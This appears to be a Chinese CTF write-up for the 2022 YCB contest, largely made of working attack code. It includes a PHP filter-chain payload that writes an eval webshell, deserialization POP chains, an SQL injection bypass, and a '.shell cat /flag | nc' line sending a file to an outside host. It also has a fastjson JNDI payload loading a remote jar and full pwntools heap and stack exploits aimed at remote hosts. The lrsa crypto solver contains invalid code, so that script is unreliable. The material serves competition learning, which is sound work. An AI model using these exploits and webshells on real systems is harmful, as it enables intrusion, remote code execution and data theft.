rce_me
老考点了,$_SERVER["QUERY_STRING"]不会对获取的内容进行URL解码因此只要URL编码一下就完事了
image-20220903131902165- 用伪协议直接RCE写shell
?file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC%5fP271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT%5fJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=index.php&0=%65%63%68%6f%20%27%3c%3f%3d%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%29%3f%3e%27%3e%32%2e%74%78%74
- SUID提权
step_by_step-v3
简单的POP链寻找EXP
<?php
error_reporting(0);
class yang
{
public $y1;
public function __tostring()
{
($this->y1)();
}
public function hint()
{
include_once('hint.php');
if(isset($_GET['file']))
{
$file = $_GET['file'];
if(preg_match("/$hey_mean_then/is", $file))
{
die("nonono");
}
include_once($file);
}
}
}
class cheng
{
public $c1;
public function __wakeup()
{
$this->c1->flag = 'flag';
}
public function __invoke()
{
$this->c1->hint();
}
}
class bei
{
public $b1;
public $b2;
public function __set($k1,$k2)
{
print $this->b1;
}
public function __call($n1,$n2)
{
echo $this->b1;
}
}
$o = new cheng;
$o->c1= new bei();
$o->c1->b1 = new yang;
$o->c1->b1->y1= new cheng;
$o->c1->b1->y1->c1 = new bei;
$o->c1->b1->y1->c1->b1=new yang;
$o->c1->b1->y1->c1->b1->y1="phpinfo";
echo serialize($o);
?>
在phpinfo中找到flag
image-20220903102650757ComeAndLogin
SQL 注入只要讲username中的单引号直接转义,password中吧单引号直接注释,拼接一个or 1,空格用tab键代替即可。
image-20220904025203043登陆后存在源码:
<?php
session_start();
if($_SESSION["admin"] !== True){
die("You are not admin");
}else{
highlight_file(__FILE__);
if(!isset($path)){
$path = $_POST['path'];
if ((substr_count($path,'/') < 3)or(substr_count($path,'.') > 0) or (preg_match("/\/\//",$path)) ){
die("invaild path");
}
echo file_get_contents($path);
}
}
代码审计发现,/
要超过三个,不能含有.
不能,不能有//
,直接2020 WMCTF中软链接套娃技巧读取flag。
Safepop
原题:https://bbs.pediy.com/thread-271714.htm
<?php
class Fun{
private $func;
public function __construct(){
$this->func = [new Test,'getFlag'];
}
}
class Test{
public function getFlag(){
}
}
class A{
public $a;
}
class B{
public $p;
}
$Class_A = new A;
$Class_B = new B;
$Class_A->a = new Fun;
$Class_B->a = $Class_A;
$payload= serialize($Class_B);
$payload = str_replace('"Fun":1:','"Fun":2:',$payload);
echo urlencode($payload);
MISC1
维吉尼亚解密得到压缩包密码:
Hello friends, I am the President of Ukraine Zelensky. The Russian army has just launched an attack on Ukraine, and the Kyiv airport has been controlled by the Russian army. Heard today is KFC Crazy Thursday, I need someone to bring me 29.94 finger-sucking original chicken as rations now. When I repel the Russian army, I will invite you to come to Ukraine to be the vice president.the password is GWHT@R1nd0yyds
解压得到:
out用hint中的脚本编写解码脚本:
from PIL import Image
flag = ''
pic = Image.open("./out.bmp","r")
for y in range(pic.size[1]):
for x in range(pic.size[0]):
pix = pic.getpixel((x,y))
flag=flag+(chr((pix[1]<<8)+pix[2]))
print(flag)
- flag在文章里面
flag{h1d3_1n_th3_p1ctur3}
MISC2
取证大师直接恢复所有文件
image-20220903233947975发现其中45.png文件损坏,缺少一个png头,加上即可,发现45.png与其他图片文件的MD5不一样,直接进行文件比较发现如下提示:
image-20220903234046087- 发现将这个当做可爱可莉.jpg的outguess密码来跑一下出现flag
- flag
- image-20220903234156786
ycb pwn wp
pwn
YCBSQL
没有ban掉.shell和.system,可以直接执行命令,然后cat /flag把内容反弹给服务器即可。
.shell cat /flag | nc 123.123.123.123 9999
fakeNoOutput
32位栈溢出
# -*- encoding: utf-8 -*-
import sys
import os
import requests
from pwn import *
binary = './fakeNoOutput'
os.system('chmod +x %s'%binary)
context.update( os = 'linux', arch = 'i386',timeout = 1)
context.binary = binary
context.log_level = 'debug'
elf = ELF(binary)
libc = elf.libc
libc = ELF('./libc.so.6')
DEBUG = 0
if DEBUG:
libc = elf.libc
p = process(binary)
else:
host = 'tcp.dasc.buuoj.cn'
port = '28103'
p = remote(host,port)
l64 = lambda : ras(u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')))
l32 = lambda : ras(u32(p.recvuntil('\xf7')[-4:].ljust(4,'\x00')))
uu64= lambda a = 6 : ras(u64(p.recv(a).ljust(8,'\x00')))
uu32= lambda a = 4 : ras(u32(p.recv(a).ljust(4,'\x00')))
rint= lambda x = 12 : ras(int( p.recv(x) , 16))
sla = lambda a,b : p.sendlineafter(str(a),str(b))
sa = lambda a,b : p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ': \033[1;36m 0x%x \033[0m' % data)
se = lambda payload : p.send(payload)
rl = lambda : p.recv()
sl = lambda payload : p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))
def ras( data ):
lg('leak' , data)
return data
def dbg( b = null):
if (b == null):
gdb.attach(p)
pause()
else:
gdb.attach(p,'b %s'%b)
def cmd(num):
sla(':',num)
def attack():
head = 'head /upload HTTP/1.1\n'
head += 'HTTP_SERVER1_token: 114514\n'
head += 'User-Agent: 114514\n'
head += 'Cookie: 114514\n'
head += 'Referer: 114514\n'
head += 'Content-Length: 5000\n'
sl(head)
payload = 'Content:filename=114514'
sl(payload)
# raw_input()
fprintf_got = elf.got['fprintf']
main_addr = 0x8049F77
send_addr = 0x080496A1
payload = 'a'*0x1044
payload += flat(send_addr , main_addr , fprintf_got)
payload = payload.ljust(5000 -25 ,'\x01')
# dbg('*0x8049B05')
sl(payload)
libc.address = l32() - libc.sym['fprintf']
binsh_addr = libc.search('/bin/sh\x00').next()
system_addr = libc.sym['system']
rop = ROP(libc)
rop.system(binsh_addr,0,0)
sl(head)
payload = 'Content:filename=114514'
sl(payload)
payload = 'a'*0x1044
payload += flat(system_addr,system_addr,binsh_addr)
payload = payload.ljust(5000 -25 ,'\x01')
# dbg('*0x8049B05')
sl(payload)
p.interactive()
attack()
'''
@File : fakeNoOutput.py
@Time : 2022/09/03 11:01:49
@Author : Niyah
'''
ez_linklist
unlink操作没有置空next,可以造成uaf
# -*- encoding: utf-8 -*-
import sys
import os
import requests
from pwn import *
binary = './ez_linklist'
os.system('chmod +x %s'%binary)
context.update( os = 'linux', arch = 'amd64',timeout = 1)
context.binary = binary
context.log_level = 'debug'
elf = ELF(binary)
libc = elf.libc
libc = ELF('./libc.so.6')
DEBUG = 0
if DEBUG:
libc = elf.libc
p = process(binary)
# p = process(['qemu-arm', binary])
# p = process(['qemu-arm','-g','1234', binary])
# p = process(['qemu-aarch64','-L','','-g','1234',binary])
else:
host = 'tcp.dasc.buuoj.cn'
port = '25325'
p = remote(host,port)
l64 = lambda : ras(u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')))
l32 = lambda : ras(u32(p.recvuntil('\xf7')[-4:].ljust(4,'\x00')))
uu64= lambda a = 6 : ras(u64(p.recv(a).ljust(8,'\x00')))
uu32= lambda a = 4 : ras(u32(p.recv(a).ljust(4,'\x00')))
rint= lambda x = 12 : ras(int( p.recv(x) , 16))
sla = lambda a,b : p.sendlineafter(str(a),str(b))
sa = lambda a,b : p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ': \033[1;36m 0x%x \033[0m' % data)
se = lambda payload : p.send(payload)
rl = lambda : p.recv()
sl = lambda payload : p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))
def ras( data ):
lg('leak' , data)
return data
def dbg( b = null):
if (b == null):
gdb.attach(p)
pause()
else:
gdb.attach(p,'b %s'%b)
def cmd(num):
sla('choice:',num)
def add(size , text = flat(0 , 0x431)):
cmd(1)
sla('Size:' , size)
sa('Content:' , text)
def link(idx , idx2):
cmd(3)
sla('from:' , idx)
sla('to:' , idx2)
def unlink(idx ,offset):
cmd(4)
sla('Index:' , idx)
sla('offset:' , offset)
def delete(idx ,offset):
cmd(2)
sla('Index' , idx)
sla('offset' , offset)
def attack():
add(0x70 )
add(0x70)
link(0 , 1)
unlink(0,0)
delete(1 , 0xff)
add(0x70)
add(0x70)
add(0x70)
add(0x70)
for i in range(0x9):
add(0x70)
link(4,5)
add(0x70)
link(2,1)
link(2,3)
delete(2,2)
delete(2,1)
link(0,2)
cmd(4)
sla('Index:' , 0)
ru('Offset 0:' )
heap_base = uu64(6) - 0x3e0
sla('offset:' , 0)
add(0x18 , flat(0 , 0x30 ,heap_base + 0x490 ))
delete(1,0)
add(0x70)
delete(2,0)
add(0x18 , flat(0 , 0x30 ,heap_base + 0x490 ))
link(0,5)
cmd(4)
sla('Index:' , 0)
ru('Offset 0:' )
__malloc_hook = l64() - 0x70
sla('offset:' , 0)
libc.address = __malloc_hook - libc.sym['__malloc_hook']
system_addr = libc.sym['system']
__free_hook = libc.sym['__free_hook']
binsh_addr = libc.search('/bin/sh').next()
lg('__free_hook',__free_hook)
delete(4 , 1)
add(0x30)
add(0x60 , flat(__free_hook-8 ,0)*6)
add(0x70 )
add(0x70 , flat('/bin/sh\x00', system_addr))
delete(8,0)
# dbg()
p.interactive()
attack()
'''
@File : ez_linklist.py
@Time : 2022/09/03 09:30:32
@Author : Niyah
'''
dream
先解一下xxtea,随后largebinattack打stderr house of apple即可
# -*- encoding: utf-8 -*-
from ctypes import *
import sys
import os
import requests
from pwn import *
binary = './dream'
os.system('chmod +x %s'%binary)
context.update( os = 'linux', arch = 'amd64',timeout = 1)
context.binary = binary
context.log_level = 'debug'
elf = ELF(binary)
libc = elf.libc
# libc = ELF('')
DEBUG = 0
if DEBUG:
libc = elf.libc
p = process(binary)
else:
host = 'tcp.dasc.buuoj.cn'
port = '24495'
p = remote(host,port)
l64 = lambda : ras(u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')))
l32 = lambda : ras(u32(p.recvuntil('\xf7')[-4:].ljust(4,'\x00')))
uu64= lambda a = 6 : ras(u64(p.recv(a).ljust(8,'\x00')))
uu32= lambda a = 4 : ras(u32(p.recv(a).ljust(4,'\x00')))
rint= lambda x = 12 : ras(int( p.recv(x) , 16))
sla = lambda a,b : p.sendlineafter(str(a),str(b))
sa = lambda a,b : p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ': \033[1;36m 0x%x \033[0m' % data)
se = lambda payload : p.send(payload)
rl = lambda : p.recv()
sl = lambda payload : p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))
def ras( data ):
lg('leak' , data)
return data
def dbg( b = null):
if (b == null):
gdb.attach(p)
pause()
else:
gdb.attach(p,'b %s'%b)
def cmd(num):
sla('choice:',num)
def add(id , size , text = 'a'):
cmd(1)
sla('ID:' , id)
sla('long:' , size)
sa('dream:' , text)
def edit(idx , text):
cmd(3)
sla('make?' , idx)
sa('dream:' , text)
def show(idx ):
cmd(4)
sla('show?' , idx)
def delete(idx ):
cmd(2)
sla('wake?' , idx)
def MX(z, y, total, key, p, e):
temp1 = (z.value>>7 ^ y.value<<3) + (y.value>>3 ^ z.value<<4)
temp2 = (total.value ^ y.value) + (key[(p&3) ^ e.value] ^ z.value)
return c_uint32(temp1 ^ temp2)
def decrypt(n, v):
key = [9,5,2,7]
delta = 0x9e3779b9
rounds = 6 + 52//n
total = c_uint32(rounds * delta)
y = c_uint32(v[0])
e = c_uint32(0)
while rounds > 0:
e.value = (total.value >> 2) & 3
for p in range(n-1, 0, -1):
z = c_uint32(v[p-1])
v[p] = c_uint32((v[p] - MX(z,y,total,key,p,e).value)).value
y.value = v[p]
z = c_uint32(v[n-1])
v[0] = c_uint32(v[0] - MX(z,y,total,key,0,e).value).value
y.value = v[0]
total.value -= delta
rounds -= 1
return v
def pack_file(_flags = 0,
_IO_read_ptr = 0,
_IO_read_end = 0,
_IO_read_base = 0,
_IO_write_base = 0,
_IO_write_ptr = 0,
_IO_write_end = 0,
_IO_buf_base = 0,
_IO_buf_end = 0,
_IO_save_base = 0,
_IO_backup_base = 0,
_IO_save_end = 0,
_IO_marker = 0,
_IO_chain = 0,
_fileno = 0,
_flags2 = 0,
_lock = 0,
_wide_data = 0,
_mode = 0):
file_struct = p32(_flags) + \
p32(0) + \
p64(_IO_read_ptr) + \
p64(_IO_read_end) + \
p64(_IO_read_base) + \
p64(_IO_write_base) + \
p64(_IO_write_ptr) + \
p64(_IO_write_end) + \
p64(_IO_buf_base) + \
p64(_IO_buf_end) + \
p64(_IO_save_base) + \
p64(_IO_backup_base) + \
p64(_IO_save_end) + \
p64(_IO_marker) + \
p64(_IO_chain) + \
p32(_fileno) + \
p32(_flags2)
file_struct = file_struct.ljust(0x88, '\x00')
file_struct += p64(_lock)
file_struct = file_struct.ljust(0xa0, '\x00')
file_struct += p64(_wide_data)
file_struct = file_struct.ljust(0xc0, '\x00')
file_struct += p64(_mode)
file_struct = file_struct.ljust(0xd8, '\x00')
return file_struct
def attack():
add(0 ,0x420 , 'aaaaaaaa')
add(1 ,0x400 , 'aaaaaaaa')
add(2 ,0x410 , 'aaaaaaaa')
add(3 ,0x400 )
delete(0)
add(4 , 0x430 )
delete(2)
show(0)
# dbg()
data = []
for i in range(0x420/4):
data.append(uu32())
dbg()
res = decrypt(0x420/4 , data)
print(res)
leak = ( res[1] << 32 ) + res[0]
heap_addr = ( res[5] << 32 ) + res[4]
__malloc_hook = leak - 0x60 - 0x400
libc.address = __malloc_hook - libc.sym['__malloc_hook']
libc_base = libc.address
__free_hook = libc.sym['__free_hook']
lg('__free_hook',__free_hook)
lg('heap_addr',heap_addr)
lg('addr',leak)
stderr = libc.sym['stderr']
edit(0 , flat(leak , leak , heap_addr ,stderr - 0x20))
add(5 ,0x4ff)
delete(5)
add(6 , 0x450)
_IO_wfile_jumps = libc.sym['_IO_wfile_jumps']
_lock = libc_base + 0x1e6680
syscall = libc.sym['alarm'] + 5
setcontext = libc.sym['setcontext']
pop_rax_ret = libc.search(asm('pop rax; ret')).next()
pop_rdi_ret = libc.search(asm('pop rdi; ret')).next()
pop_rsi_ret = libc.search(asm('pop rsi; ret')).next()
pop_rdx_pop_rbx_ret = libc.search(asm('pop rdx ; pop rbx ; ret')).next()
ret = pop_rdi_ret + 1
fake_io_addr = heap_addr + 0x840
flag_addr = fake_io_addr + 0x300 + 0x10
file = pack_file(
_flags = 0,
_lock = _lock,
_IO_write_ptr = 0xa81, # 0xb81
_wide_data = fake_io_addr + 0xe0 ,
) + p64(_IO_wfile_jumps)
rop = ROP(libc)
rop.open(flag_addr , 0,0)
rop.read(3 , flag_addr , 0x40)
rop.write(1 , flag_addr , 0x40)
payload = p64(fake_io_addr + 0xe8)+'\x00'*0x98
payload += flat(fake_io_addr + 0xe0*2+0x10 , ret )
payload += '\x00'*0x30
payload += p64(fake_io_addr + 0xe0*2-0x68+8)
payload += p64(setcontext+61)
payload += rop.chain()
payload = file[0x10:] + payload
payload = payload.ljust( 0x300,'\x00')+ 'flag\x00'
edit(2 , payload)
edit(5 , flat(0 , 0x100)*0x49)
# cmd(5)
cmd(1)
sla('ID:' , 7)
# dbg('_IO_wfile_overflow')
sla('long:' , 0x4ff)
# dbg()
# p.success(getShell())
p.interactive()
attack()
'''
@File : dream.py
@Time : 2022/09/03 17:28:55
@Author : Niyah
'''
simple_json
根据题目信息猜测打fastjson,pom显示fastjson版本是1.2.83,源码里有个Message类和JNDIService类搭配可触发jndi,并且出题人的Test.class忘记删除,题目反序列化的点在于/ApiTest/post,经过验证确认可用。
{"content" : {"@type": "ycb.simple_json.service.JNDIService", "target":"ldap://xxx:port/xxx"}, "msg":{"$ref":"$.content.context"}}
看了一下没什么依赖,常规的加载远程恶意类的方式打不通,jar包本地用的低版本的jdk启动后发现可以打通,确定了是jdk版本问题,远程应该是一个高版本的jdk。
Jndi绕过高版本jdk的方式有很多:https://tttang.com/archive/1405/
一一比较后能够发现有两个类可用:
org.apache.catalina.users.MemoryUserDatabaseFactory\org.yaml.snakeyaml.Yaml
前者可用来打xxe,在一定情况下也可以RCE:
image-20220904115911678不过不知为何貌似不解析dtd,没能实现外带数据,在这里卡了很久,之后才发现存在snakeyaml这个库。
修改一下Welk1n师傅的jndi-bypass注入工具,添加上snakeyaml:
image-20220904120354441yaml反序列化:https://github.com/artsploit/yaml-payload/
改一下执行的命令之后生成jar包:
javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .
起个http服务器把生成的jar包丢到目录之后就可以进行利用了。
最后exp:
{"content" : {"@type": "ycb.simple_json.service.JNDIService", "target":"rmi://xxx:port/tomcat_snakeyaml"}, "msg":{"$ref":"$.content.context"}}
easy_rsa
#!/usr/bin/env python
# coding: utf-8
# In[19]:
f = open("output.txt", "r")
a = f.readlines()
# In[20]:
ns = [0 for i in range(len(a))]
for i in range(len(a)):
ns[11-i] = int(a[i])
# In[38]:
p = gcd(ns[0],ns[1])
tm = 38127524839835864306737280818907796566475979451567460500065967565655632622992572530918601432256137666695102199970580936307755091109351218835095309766358063857260088937006810056236871014903809290530667071255731805071115169201705265663551734892827553733293929057918850738362888383312352624299108382366714432727
# In[39]:
e = 65537
for n in ns:
q = n // p
assert(is_prime(q))
d = inverse_mod(e,(p-1)*(q-1))
tm = power_mod(tm,d,n)
# In[40]:
print(tm)
# In[41]:
import libnum
# In[42]:
libnum.n2s(int(tm))
# In[ ]:
lrsa
'''
t=(pP-58P+q)%Q
t=(pP-58P+q)+kQ
kQ=t-(p-58)*P+q
kQ/P = (p-58) + (t+q)/P
Q/P = (p-58)/k + (t+q)/(kP)
Q/P - (p-58)/k = (t+q)/(kP) < 1/2k^2
'''
from Crypto.Util.number import *
from gmpy2 import gcd
from sympy import isprime
t=44
e=65537
c=4364802217291010807437827526073499188746160856656033054696031258814848127341094853323797303333741617649819892633013549917144139975939225893749114460910089509552261297408649636515368831194227006310835137628421405558641056278574098849091436284763725120659865442243245486345692476515256604820175726649516152356765363753262839864657243662645981385763738120585801720865252694204286145009527172990713740098977714337038793323846801300955225503801654258983911473974238212956519721447805792992654110642511482243273775873164502478594971816554268730722314333969932527553109979814408613177186842539860073028659812891580301154746
PPQ = 17550772391048142376662352375650397168226219900284185133945819378595084615279414529115194246625188015626268312188291451580718399491413731583962229337205180301248556893326419027312533686033888462669675100382278716791450615542537581657011200868911872550652311318486382920999726120813916439522474691195194557657267042628374572411645371485995174777885120394234154274071083542059010253657420242098856699109476857347677270860654429688935924519805555787949683144015873225388396740487817155358042797286990338440987035608851331840925854381286767024584195081004360635842976624747610461507795755042915965483135990495921912997789567020652729777216671481467049291624343256152446367091568361258918212012737611001009003078023715854575413979603297947011959023398306612437250872299406744778763429172689675430968886613391356192380152315042387148665654062576525633130546454743040442444227245763939134967515614637300940642555367668537324892890004459521919887178391559206373513466653484926149453481758790663522317898916616435463486824881406198956479504970446076256447830689197409184703931842169195650953917594642601134810084247402051464584676932882503143409428970896718980446185114397748313655630266379123438583315809104543663538494519415242569480492899140190587129956835218417371308642212037424611690324353109931657289337536406499314388951678319136343913551598851601805737870217800009086551022197432448461112330252097447894028786035069710260561955740514091976513928307284531381150606428802334767412638213776730300093872457594524254858721551285338651364457529927871215183857169772407595348187949014442596356406144157105062291018215254440382214000573515515859668018846789551567310531570458316720877172632139481792680258388798439064221051325274383331521717987420093245521230610073103811158660291643007279940393509663374960353315388446956868294358252276964954745551655711981
PQQ = 17632503734712698604217167790453868045296303200715867263641257955056721075502316035280716025016839471684329988600978978424661087892466132185482035374940487837109552684763339574491378951189521258328752145077889261805000262141719400516584216130899437363088936913664419705248701787497332582188063869114908628807937049986360525010012039863210179017248132893824655341728382780250878156526086594253092249935304259986328308203344932540888448163430113818706295806406535364433801544858874357459282988110371175948011077595778123265914357153104206808258347815853145593128831233094769191889153762451880396333921190835200889266000562699392602082643298040136498839726733129090381507278582253125509943696419087708429546384313035073010683709744463087794325058122495375333875728593383803489271258323466068830034394348582326189840226236821974979834541554188673335151333713605570214286605391522582123096490317734786072061052604324131559447145448500381240146742679889154145555389449773359530020107821711994953950072547113428811855524572017820861579995449831880269151834230607863568992929328355995768974532894288752369127771516710199600449849031992434777962666440682129817924824151147427747882725858977273856311911431085373396551436319200582072164015150896425482384248479071434032953021738952688256364397405939276917210952583838731888536160866721278250628482428975748118973182256529453045184370543766401320261730361611365906347736001225775255350554164449014831203472238042057456969218316231699556466298168668958678855382462970622819417830000343573014265235688391542452769592096406400900187933156352226983897249981036555748543606676736274049188713348408983072484516372145496924391146241282884948724825393087105077360952770212959517318021248639012476095670769959011548699960423508352158455979906789927951812368185987838359200354730654103428077770839008773864604836807261909
PQ = GCD(PPQ,PQQ)
Q = PQQ // PQ
P = PPQ // PQ
for each in continued_fraction(Q/P).convergents():
p_58 = each.numerator()
k = each.denominator()
p = int(p_58+58)
if p.bit_length() == 1023 and isPrime(int(p)):
# t=(pP-58P+q)%Q
q = (t-pP+58P) % Q
phi = (p-1)*(q-1)
d = inverse(e,phi)
m = pow(c,d,p*q)
print(long_to_bytes(m))